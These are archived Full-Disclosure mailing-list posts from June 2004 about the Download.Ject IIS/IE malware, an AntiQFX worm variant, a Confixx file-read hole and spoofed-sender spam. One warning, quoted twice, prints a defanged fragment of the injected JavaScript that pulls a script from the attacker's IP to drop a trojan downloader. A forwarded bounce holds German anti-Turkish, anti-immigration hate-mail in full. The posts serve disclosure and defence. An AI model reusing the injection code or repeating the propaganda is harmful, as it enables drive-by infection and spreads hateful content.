> (something like rdist?) sshkeys?
>
Hi, I just reply 'cause I think there are more people that like to know
this...

If you have a lot of servers to work on, try the "Distributed Shell" one
command on all servers at the same time.

check http://www.netfort.gr.jp/~dancer/software/dsh.html

later ll
misiu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Peter Kruse (krusekrusesecurity.dk)
Date: Fri Jun 25 2004 - 01:05:28 CDT

Hi Nick,

>It does this via the now very old ms-its: protocol zone-handling bug...
>Apparently someone needs to decode a few more levels of JavaScript, etc
>to work this all out...

I don´t think so. This looks a lot like the unpatched IE bug that was also
exploited by the Ilookup trojan. See http://62.131.86.111/analysis.htm.

>> Consider to deny access to http://217.107.218.147 in your firewall. This
>> will at least prevent client PCs from getting infected.
>
>Thanks Peter, but what about all the _other_ servers out there also
>hosting more or less exactly the same files? Are you going to provide
>a list of all those IPs too?

Why should I? I think you should look at the code again, Nick.

When the javascript runs it will try to redirect you to a remote server
http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
stored. As far as I know they do not reside on the compromised IIS servers,
but simply pulls of the the payload from the remote host. Meanwhile the host
is no longer available.

Regards
Peter Kruse

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Jean-Marie Monnier (kedvesattglobal.net)
Date: Tue May 25 2004 - 03:45:14 CDT

I have - and this annoyance still goes on- experimented something
similar as the "stealing of identity reported by Suart (except that
there is so far no "hate mail" involved, but "good old spamming"? to
sell junk or offer access to porn sites, which I discovered by getting
undelivered mail sent under my email address, but with so far a fake
name... To wit:
=========================================================================================================

A message (from <kedvesattglobal.net>) (that's moi!) was received at 24 Jun 2004 20:19:46 +0000.

The following addresses had delivery problems:

<keithbattglobal.net>
        Permanent Failure: 522_mailbox_full;_group_quota_sz=3144715/3145728_ct=734/100000
        Delivery last attempted at Thu, 24 Jun 2004 20:19:46 -0000

------------------------------------------------------------------------

Reporting-MTA: dns; prserv.net
Arrival-Date: 24 Jun 2004 20:19:46 +0000

Final-Recipient: rfc822; <keithbattglobal.net>
Action: failed
Status: 5.0.0 522_mailbox_full;_group_quota_sz=3144715/3145728_ct=734/100000
Diagnostic-Code: smtp; Permanent Failure: Other undefined Status
Last-Attempt-Date: Thu, 24 Jun 2004 20:19:46 -0000

------------------------------------------------------------------------

Sujet:
<<POTENTIAL-SPAM>> 452332
De:
"Louis Hastings" <kedvesattglobal.net>
Date:
Sun, 27 Jun 2004 00:31:32 +0400

A:
"Kedves" <kedvesattglobal.net>

Kedves, Looking for not expensive high-quality software?
We might have just what you need.

Windows XP Professional 2002
<http://M6AsC.mhcnjcnn.info/?wf2B2NwL1A7pOw0U0E>............. $50
<http://U3GHRW.cklibcdn.info/?N0PSPyhwOloazNNuJQhOZU>
and lots more... <http://86InS.cklibcdn.info/?mBoXU7m5nWtLEmmQYj>
======================================================================================================
I can't figure how "they" do this, and if I have a way to protect
myself... I am also afraid that this mail can- and is probably- not sent
at random, but also to some preople found out in my address book or
elsewhere, and might paint me as a "black sheep"....

Chers, jm

lsi a écrit:

>On June 11 it was reported that Dutch mailboxes were flooded with racist
>hatemail sent via the Sobig worm.
>
>http://www.theregister.co.uk/2004/06/11/german_hate_mail_virus/
>
>I can report that not only is this activity continuing, but it is
>doing so under the names of ... well, me, at least - I have received
>several bounces indicating that my email address is being used as the
>"from" address.
>
>I include the fulltext of a sample bounce below. Note: the text is
>reportedly racist in nature. I include it for forensic purposes.
>This is the full disclosure list, right?
>
>Maybe it was just me who got joe-jobbed by Sobig in this way? Or
>maybe there are some other posters to the security conferences who
>are being toasted too?
>
>Note: 82.3.47.243 is apparently a cable connection owned by NTL UK.
>Probably just an owned box though. And probably a dynamic IP as
>well.
>
>Stuart
>
>[ok, I trimmed these headers, irrelevant]
>Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>From: MAILER-DAEMONpfmx1.pop.uk.netscalibur.com (Mail Delivery System)
>Subject: Undelivered Mail Returned to Sender
>To: stuartcyberdelix.net
>
>This is a MIME-encapsulated message.
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
>Content-Description: Notification
>Content-Type: text/plain
>
>This is the Postfix program at host pfmx1.pop.uk.netscalibur.com.
>
>I'm sorry to have to inform you that the message returned
>below could not be delivered to one or more destinations.
>
>For further assistance, please send mail to <postmaster>
>
>If you do so, please include this problem report. You can
>delete your own text from the message returned below.
>
> The Postfix program
>
><louisecyrus02.pop.uk.netscalibur.com>: host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
>Content-Description: Delivery error report
>Content-Type: message/delivery-status
>
>Reporting-MTA: dns; pfmx1.pop.uk.netscalibur.com
>Arrival-Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>
>Final-Recipient: rfc822; louisecyrus02.pop.uk.netscalibur.com
>Action: failed
>Status: 5.0.0
>Diagnostic-Code: X-Postfix; host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
>Content-Description: Undelivered Message
>Content-Type: message/rfc822
>Content-Transfer-Encoding: 8bit
>
>Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
> by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id 69D9D6749F5
> for <louisedircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>Received: from qmx0.uk.netscalibur.com (qmx0.uk.netscalibur.com [194.112.32.44])
> by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
> with SMTP id AVI60539;
> Thu, 24 Jun 2004 13:04:08 +0100 (BST)
>Received: (qmail 95729 invoked from network); 24 Jun 2004 12:04:33 -0000
>Cc: recipient list not shown: ;
>Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
> by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun 2004 12:04:30 -0000
>From: stuartcyberdelix.net
>Date: Thu, 24 Jun 2004 11:33:35 GMT
>MIME-Version: 1.0
>Subject: EU Beitritt der Tuerkei ? (Id:9951)
>Importance: Normal
>X-Priority: 3 (Normal)
>Message-ID: <4148b811e04d28.e372b.qmailcyberdelix.net>
>Content-Transfer-Encoding: 7bit
>Content-Type: text/plain; charset="us-ascii"
>
>Aufnahme der Beitrittsverhandlungen mit der Tuerkei oder nicht - eine Entscheidung, die 'das Ende Europas' bedeuten koennte. Dieses Wort stammt vom frueheren franzoesischen Praesidenten Giscard d'Estaing.
>Schon 2002 hatte er davor gewarnt, dass ein Beitritt der Tuerkei zur EU dem 'Ende Europas' gleichkaeme. Die bundesdeutschen Beitrittsbefuerworter verdraengen und verschweigen die unabsehbaren Folgen dieser Entscheidung:
>
>(1) Die Tuerkei hat schon jetzt 70 Millionen Einwohner. Sie wird bis zu ihrem EU-Beitritt die BRD in der Bevoelkerungszahl ueberholt haben und in den EU-Institutionen das entsprechende Stimmengewicht erhalten.
>(2) Die Tuerkei passt wirtschaftlich nicht in die EU. Das Land ist hoffnungslos ueberschuldet und waere ohne staendige internationalen Kredite laengst bankrott. Das Pro-Kopf-Einkommen betraegt nur 23% des EU-Durchschnitts. Die EU-Subventionen, auf die die Tuerkei Anspruch haette, wuerden nicht nur den Bruesseler Haushalt sprengen, sondern auch die heute schon ueberschuldeten 'Geberlaender' wie die BRD gaenzlich ruinieren.
>(3) Mit der Aufnahme eines asiatischen Landes und dem Verzicht auf vernuenftige Aussengrenzen verliert die EU ihre Identitaet.
>
>Trotz dieser unbestreitbaren Sprengsaetze rollt die Kampagne fuer den tuerkischen Beitritt immer schneller und unaufhaltsamer voran: Der tuerkische Regierungschef Erdogan nimmt bereits an den Konferenzen der EU-Regierungschefs teil, freilich noch ohne Stimmrecht und die Tuerkei erhaelt jetzt schon EU-Gelder zur 'Beitrittsvorbereitung'.
>Es ist alles wie bei der Euro-Einfuehrung: Erst erscheint der ganze Plan unrealistisch und wird von vielen fuer undurchfuehrbar gehalten; dann wird eine offene Diskussion ueber Pro und Contra als 'europa- oder fremdenfeindlich' kriminalisiert, und schliesslich wird die Entscheidung hinter verschlossenen Tueren, ohne Beteiligung des demokratischen Souveraens und ohne Volksabstimmung gefaellt und fuer unumkehrbar erklaert.
>Dasselbe Spiel mit den Vorbedingungen: Beim Euro waren es die Maastrichter Kriterien, die schon vor 1999 nicht erfuellt wurden und inzwischen offen missachtet werden. Die Tuerkei-Kriterien heissen: Wiedervereinigung Zyperns (als ob das so wichtig waere), Menschenrechte, Demokratisierung. Nichts hindert Ankara daran, diese Bedingungen pro forma zu erfuellen. Selbst wenn sie erfuellt wuerden, waeren damit die oben angefuehrten grundlegenden Argumente gegen den Tuerkei-Beitritt nicht im geringsten widerlegt.
>Ein uebles Spiel, das den Verdacht naehrt, hier werde eine Verschwoerung gegen Deutschland und Europa angezettelt. Berlin hat sich ohne jedes Waehlermandat bereits festgelegt. Sollte der Beitritt scheitern, sagte Aussenminister Fischer laut 'WamS' vom 8. 2. 2004, wuerde man dafuer 'einen sehr hohen Preis zahlen'.
>
>Ein Satz, den man zweimal lesen muss. Fischer droht dem deutschen Volk. Worin der hohe Preis bestehen wuerde, verschweigt er. Vielleicht meint er, dass die in Deutschland lebenden Tuerken auf die Strasse gehen koennten. Oder er fuerchtet den Zorn der USA, die den Beitritt seit Jahren verlangen. Washington weiss genau, dass die Aufnahme Kleinasiens zu einem 'bankrotten Halt' der gesamten EU (so die 'Financial Times' vom 15.1.2004) fuehren koennte. Ganz nuechtern urteilt die 'International Herald Tribune' am
>24.11.2003:
>
>'Dass die Bevoelkerung in ganz Europa schrumpft, bedeutet, dass noch mehr Einwanderung bevorsteht. Die Aufnahme der Tuerkei als EU-Mitglied wuerde diesen Trend beschleunigen und die Definition Europas unwiderruflich aendern … Viele Europaeer muessen erst noch akzeptieren, dass die traditionell weisse, christliche Kultur ihrer Vorfahren abgeloest wird von einem multikulturellen Mix mit einem starken islamischen Gewicht.'
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com--
>
>-- End --
>------- End of forwarded message -------
>
>---
>Stuart Udall
>stuart atcyberdelix.dot net - http://www.cyberdelix.net/
>
>---
> * Origin: lsi: revolution through evolution (192.168.0.2)
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: Tim (timabenath.de)
Date: Fri Jun 25 2004 - 03:05:58 CDT

Hello List,

> > Found a issue last night while testing php_exec_dir patch

Where is this patch from? I was not able to locate it with an google search.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Call For Papers : HITB Security Conference 2004

From: Alphademon (alphademonalphademon.com)
Date: Thu Jun 24 2004 - 22:38:50 CDT

Hack In The Box Security Conference 2004 : Kuala Lumpur, Malaysia
-----------------------------------------------------------------

Greetings,

We are inviting individuals or groups who are interested in computer
security, challenges and practices especially the latest technological
innovations to send in your papers to us not later than September 1st
2004.

Topics & details are available online at :-

http://conference.hackinthebox.org/cfp.php

Thank you,

alphademon[at]hackinthebox.org
-
HackInTheBox Security Conference 2004
Kuala Lumpur, Malaysia
"Oct 04 - 07 2004"
-

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Duncan Hill (dhill+fulldisccricalix.net)
Date: Fri Jun 25 2004 - 04:36:08 CDT

On Friday 25 June 2004 07:05, Peter Kruse might have typed:

> When the javascript runs it will try to redirect you to a remote server
> http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
> stored. As far as I know they do not reside on the compromised IIS servers,
> but simply pulls of the the payload from the remote host. Meanwhile the
> host is no longer available.

I've noticed that several ISPs appear to have null-routed that IP. I can't
get past our ISP's upstream right now - trace just dies.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Paolo A. Gallenga (paolo.gallengaatlantica.it)
Date: Fri Jun 25 2004 - 04:34:47 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Grisoft's AVG 6.0.71 DAT 466 23/06/2004 also detects it as Win32/Antiqfx.

Regards, Paolo

X iniT wrote:
| Hello all,
|
|
| The attached file seems to be a variant of AntiQFX
| worm.
|
| AntiQFX Worm masquerades as
| an old dos utilitly "MSCDEX.EXE". Basically
| spreads via shared networks and delets a few
| files which belong to a couple of Photo Editting
| softwares.
| Its PE-Packed and has an anti-deletion routine.
|
| So you might be guessing whats the big deal!!
|
| Look closely and you'll see that i've attached this
| file using my yahoo account. Which happens to be
| protected by NAV !!!
|
| The following link clearly states that NAV detects
| this worm since 2002 !!!
|
http://securityresponse.symantec.com/avcenter/venc/data/w32.antiqfx.f.worm.html
|
| Same thing is with AVP, ClamV & F-Prot.
|
| Only Sophos detects this file as AntiQFX.F variant.
|
| So keep an eye friends, this incident has really
| made me have second thoughts about antivirus softwares
| and their reliability.
|
|
| Regards,
| X!
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)

iD8DBQFA2/G2wreiUCR0oIoRApeDAKCttD8rFOsDhBviLahAEqhycmXR5wCgo+pD
mFTUPjPHzZcnaO/5zfJss+A=
=eAmZ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: X iniT (x1n1tyahoo.com)
Date: Fri Jun 25 2004 - 02:36:07 CDT

Hello all,

The attached file seems to be a variant of AntiQFX
worm.

AntiQFX Worm masquerades as
an old dos utilitly "MSCDEX.EXE". Basically
spreads via shared networks and delets a few
files which belong to a couple of Photo Editting
softwares.
Its PE-Packed and has an anti-deletion routine.

So you might be guessing whats the big deal!!

Look closely and you'll see that i've attached this
file using my yahoo account. Which happens to be
protected by NAV !!!

The following link clearly states that NAV detects
this worm since 2002 !!!
http://securityresponse.symantec.com/avcenter/venc/data/w32.antiqfx.f.worm.html

Same thing is with AVP, ClamV & F-Prot.

Only Sophos detects this file as AntiQFX.F variant.

So keep an eye friends, this incident has really
made me have second thoughts about antivirus softwares
and their reliability.

Regards,
X!

                
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Duncan Hill (dhill+fulldisccricalix.net)
Date: Fri Jun 25 2004 - 05:56:29 CDT

On Friday 25 June 2004 08:36, X iniT might have typed:

> AntiQFX Worm masquerades as
> an old dos utilitly "MSCDEX.EXE". Basically
> spreads via shared networks and delets a few
> files which belong to a couple of Photo Editting

F-Secure Anti-Virus for Linux version 4.52 build 2461
Copyright (c) 1999-2003 F-Secure Corporation. All Rights Reserved.

Database version: 2004-06-25_01

Scan started at Fri Jun 25 11:55:26 2004

MSCDEX.EXE: Infected: Win32.HLLW.AntiQFX.a [AVP]
MSCDEX.EXE: Infected: Win32.HLLW.AntiQFX.a [AVP]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Security hole in Confixx backup script

From: Dirk Pirschel (dirkpirschel.de)
Date: Fri Jun 25 2004 - 08:08:34 CDT

Hi,

I found a security hole in Confixx. A malicious backup request via the
webinterface might be used by any user to read files located in /root
(which is the default installation directory of confixx).

The most interesting files you can retrieve with this attack are:
  /root/confixx/safe/shadow.tmp
  /root/confixx/safe/shadow_header
These files are used to build /etc/shadow, i.e. they contain all
(encrypted) passwords used on this host.

SWSoft has been informed yesterday at 22:30 (CET).

If you are using confixx, you should disable the backup script.

-Dirk

--
Linux - The choice of a GNU generation

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFA3CPSxJ5Dfiog8/YRAn3zAJwLwFHsaNu550zImBv6rJdmooL6uwCgiY4Y
R0rGYwd0R6SL6ZGWnDQUpk4=
=oG1O
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Gary Flynn (flynngnjmu.edu)
Date: Fri Jun 25 2004 - 08:20:34 CDT

Just a reminder. This isn't the first time this has
happened:

http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675

--
Gary Flynn
Security Engineer
James Madison University

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Charles Richmond (cmriisc.com)
Date: Fri Jun 25 2004 - 08:24:16 CDT

On Jun 24, 2004, at 11:43 PM, lsi wrote:

> I can report that not only is this activity continuing, but it is
> doing so under the names of ... well, me, at least - I have received
> several bounces indicating that my email address is being used as the
> "from" address.

The spammers are using addresses from bugtraq submissions
and other security lists also. Clearly it is to their advantage to
harass those of us who are at all active on the security and
anti-spam side. It took Verizon months to stop blocking based
on spoofed addresses and Barry Shein's "Software Tool & Die"
(std.com) is still blocking based on spoofed addresses.

It behooves all of us to do our best to block actual spammers
and not their spoofed victims.

                                                   Charles Richmond

       Implemented Integrated Systems Corporation http://www.iisc.com
     O/S, I18N, Systems Development, Process and Integration Providers
     cmriisc.com cmracm.org YIM:cmriisc http://www.iisc.com/cmr
            7B West St., Somerville, Ma. USA 02144 (781) 389 9777

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: joe (mvpjoeware.net)
Date: Fri Jun 25 2004 - 08:47:37 CDT

For the IIS side....

http://www.microsoft.com/security/incident/download_ject.mspx
 

Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: full-disclosurelists.netsys.com
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
      showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
trojan-downloader and run it.

Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] server administration

From: Mohit Muthanna (mohit.muthannagmail.com)
Date: Fri Jun 25 2004 - 09:40:01 CDT

Harry,

What you're talking about falls under the realm of Systems / Network
Management. Generally when you have large numbers of servers / devices
to manage you need an effective tool. You can write your own scripts,
but you'd just be duplicating the efforts of a number of available
tools out there.

I'd suggest you read up on SNMP. And check out the following tools
(google them):

- net-snmp ( an SNMP agent )
- nagios ( very sophisticated network management tool )
- nmap ( good discovery tool )
- ntop ( traffic analysis, RMON agent, performance monitoring )
- sar ( system performance monitoring )
- argus (network performance monitornig)
- rsync (distributed configurations, files etc.)
- openssh (if you don't know what this is, you're in trouble)
- rcs, cvs or subversion (change control)

There are also a number of commercial tools availabe, but the above
list encompasses most of what you will need.

Hope this helps,
Mohit.

--
Mohit Muthanna, CISSP
mohit (at) muthanna (uhuh) com
"There are 10 types of people. Those who understand binary, and those
who don't."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

bills.bitchhushmail.com
Date: Fri Jun 25 2004 - 10:01:33 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicuous
anti-Microsoft attempt to discredit their security commitments by people
who are jealous of Bill Gates wealth. That or maybe by disgruntled individuals
who failed to earn their MVP status.

> For the IIS side....
>
> http://www.microsoft.com/security/incident/download_ject.mspx
>
>
>
> Microsoft teams are investigating a report of a security issue affecting
> customers using Microsoft Internet Information Services 5.0 (IIS) and
> Microsoft Internet Explorer, components of Windows.
>
> Important Customers who have deployed Windows XP Service Pack 2 RC2
are not
> at risk.
>
> Reports indicate that Web servers running Windows 2000 Server and IIS
that
> have not applied update 835732, which was addressed by Microsoft Security
> Bulletin MS04-011, are possibly being compromised and being used to
attempt
> to infect users of Internet Explorer with malicious code.
>
>
>
>
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Peter
Kruse
> Sent: Thursday, June 24, 2004 7:22 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] New malware to infect IIS and from there
jump to
> clients
>
> Hi all,
>
> This is a heads up.
>
> A new malware has been reported from several sources so it appears
to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit
the
> webpage of the infected server. How the IIS servers was compromised
in the
> first place is unfortunately still unknown (any info on that would
be
> appreciated).
>
> The malware redirects a visitor to http: //217.107.218.147/xxx.php.
It does
> so by running a javascript that apparently gets appended to several
files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> <script language="Javascript">
>
> function InjectedDuringRedirection(){
> showModalDialog('md.htm', window, "dialog
> Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
> :1\;").location= " java script:'<SCRIPT SRC =\\' http://
> 217.107.218.147/shellxxx.js\\'> <\ /script>'";
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in
the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
> trojan-downloader and run it.
>
> Consider to deny access to http://217.107.218.147 in your firewall.
This
> will at least prevent client PCs from getting infected.
>
> Further information can be found in the daily log from SANS:
> http://isc.sans.org/
>
> Regards
> Peter Kruse
> http://www.csis.dk
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A
n1iDB7VSzmP2NVQyeldO+9agWW8q
=Uc5R
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

dinisddplus.net
Date: Fri Jun 25 2004 - 09:50:35 CDT

With the current (in)security of most (if not all) ISP
that provide ASP.Net or ASP Classic shared hosting
services, all the attakers need to do is to get an
hosting account in a shared hosting server (trivial)
and infect these websites from the inside.

I haven't heard of any new IIS exploit (which doesn't
mean that they don't exist), but compromizing the IIS
box from the inside (as seen by the interland story) is
probably how this happened.

BTW, do you know which ISP hosts the 'compromized'
websites?

Dinis Cruz
.Net Security Consultant
DDPlus

On Fri, 25 Jun 2004 09:20:34 -0400, Gary Flynn wrote

>
> Just a reminder. This isn't the first time this has
> happened:
>
>
http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675
>
> --
> Gary Flynn
> Security Engineer
> James Madison University
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html

----------------------------------------
Scanned by Emailfiltering.co.uk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] server administration

From: Mohit Muthanna (mohit.muthannagmail.com)
Date: Fri Jun 25 2004 - 09:58:19 CDT

> Having said that, you're going to be disappointed in what snmp will
> provide unless you want to start writing MIBs (you don't). So you will
> be doing some sort of client/server model maybe with *NIX tools like
> vmstat and traceroute and wget. We did something similar in 1998 I
> recall.

I wouldn't discount SNMP so easily. A good SNMP agent will provide a
lot of useful information related to the system. Eg. see net-snmp
(opensource) or sysedge (Commercial).

You don't _ever_ have to write a MIB unless you're developing an SNMP
agent/layer for a custom application.

I've worked in environments (ISPs and Telecos) where we've had to
manange servers with numbers in the thousands. And generally the first
question we ask when a new device comes in is: "Is it SNMP enabled?"

Standard UNIX tools vmstat, traceroute, etc. are cool when you're
trying to debug a problem on a machine. Or when you have only a few
machines to maintain. But as soon as you hit about 30 - 40 machines,
your'e going to have problems.

SNMP (v1 and v2c) does, OTOH, have security drawbacks since the
packets pretty much "in the air". But with good host and network
security, you can work around them. SNMPv3 addresses most of the
security issues with the earlier versions.

Mohit.

--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
"There are 10 types of people. Those who understand binary, and those
who don't."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Jean-Marie Monnier (kedvesattglobal.net)
Date: Tue May 25 2004 - 10:44:41 CDT

I can only second Charles' and Isi's statements.... I sent a mail
earlier this morning to the list, and it was bounced back to me by
different engines. I made my case worse by underlining the fact that
the body of the messages sent under my sp**fed identity were either
advertising P*RN sites, or were plain SP*M for any kind of products..
the full and correct spelling of P*RN and SP*M triggered also some
sites to reject straight away my message ;-). Life is not easy, and it
seems we ain't seen anything yet... oh well...:-)
 
Jean-Marie Monnier

Charles Richmond a écrit:

>
> On Jun 24, 2004, at 11:43 PM, lsi wrote:
>
>> I can report that not only is this activity continuing, but it is
>> doing so under the names of ... well, me, at least - I have received
>> several bounces indicating that my email address is being used as the
>> "from" address.
>
>
> The spammers are using addresses from bugtraq submissions
> and other security lists also. Clearly it is to their advantage to
> harass those of us who are at all active on the security and
> anti-spam side. It took Verizon months to stop blocking based
> on spoofed addresses and Barry Shein's "Software Tool & Die"
> (std.com) is still blocking based on spoofed addresses.
>
> It behooves all of us to do our best to block actual spammers
> and not their spoofed victims.
>
> Charles Richmond
>
> Implemented Integrated Systems Corporation http://www.iisc.com
> O/S, I18N, Systems Development, Process and Integration Providers
> cmriisc.com cmracm.org YIM:cmriisc http://www.iisc.com/cmr
> 7B West St., Somerville, Ma. USA 02144 (781) 389 9777
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Fri Jun 25 2004 - 10:58:28 CDT

X iniT <x1n1tyahoo.com> wrote:

<<snip>>
> Look closely and you'll see that i've attached this
> file using my yahoo account. Which happens to be
> protected by NAV !!!
>
> The following link clearly states that NAV detects
> this worm since 2002 !!!
> http://securityresponse.symantec.com/avcenter/venc/data/w32.antiqfx.f.worm
> .html
>
> Same thing is with AVP, ClamV & F-Prot.
>
> Only Sophos detects this file as AntiQFX.F variant.

That's odd -- I had the file scanned with 22 different virus scanners
and only three (NAV, Panda and ClamAV) missed detecting it as "AntiQFX"
or something very similar...

Regards,

Nick FitzGerald

_______________________________________________
